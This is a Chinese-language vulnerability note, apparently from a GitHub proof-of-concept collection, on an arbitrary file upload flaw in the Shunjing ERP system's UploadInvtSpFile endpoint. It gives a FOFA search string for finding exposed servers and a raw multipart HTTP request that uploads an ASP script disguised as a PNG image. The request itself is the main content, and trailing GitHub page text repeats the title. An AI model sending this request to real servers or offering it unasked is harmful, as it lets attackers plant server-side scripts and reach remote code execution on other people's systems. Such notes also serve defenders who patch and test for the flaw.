顺景ERP管理系统UploadInvtSpFile存在任意文件上传漏洞

顺景ERP管理系统UploadInvtSpFile存在任意文件上传漏洞，允许攻击者上传恶意文件到服务器，可能导致远程代码执行、网站篡改或其他形式的攻击，严重威胁系统和数据安全。

fofa

body="/api/DBRecord/getDBRecords"

poc

POST /api/cgInvtSp/UploadInvtSpFile HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=-----------------1111
Content-Length: 178

-------------------1111
Content-Disposition: form-data; name="filedata"; filename="2142142142.asp"
Content-Type: image/png

<% response.write("1111")%>
-------------------1111--

漏洞来源

https://mp.weixin.qq.com/s/BrbgHxUO4GJ0Haza5xf6dQ

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

顺景ERP管理系统UploadInvtSpFile存在任意文件上传漏洞.md

顺景ERP管理系统UploadInvtSpFile存在任意文件上传漏洞.md

顺景ERP管理系统UploadInvtSpFile存在任意文件上传漏洞

fofa

poc

漏洞来源

Files

顺景ERP管理系统UploadInvtSpFile存在任意文件上传漏洞.md

Latest commit

History

顺景ERP管理系统UploadInvtSpFile存在任意文件上传漏洞.md

File metadata and controls

顺景ERP管理系统UploadInvtSpFile存在任意文件上传漏洞

fofa

poc

漏洞来源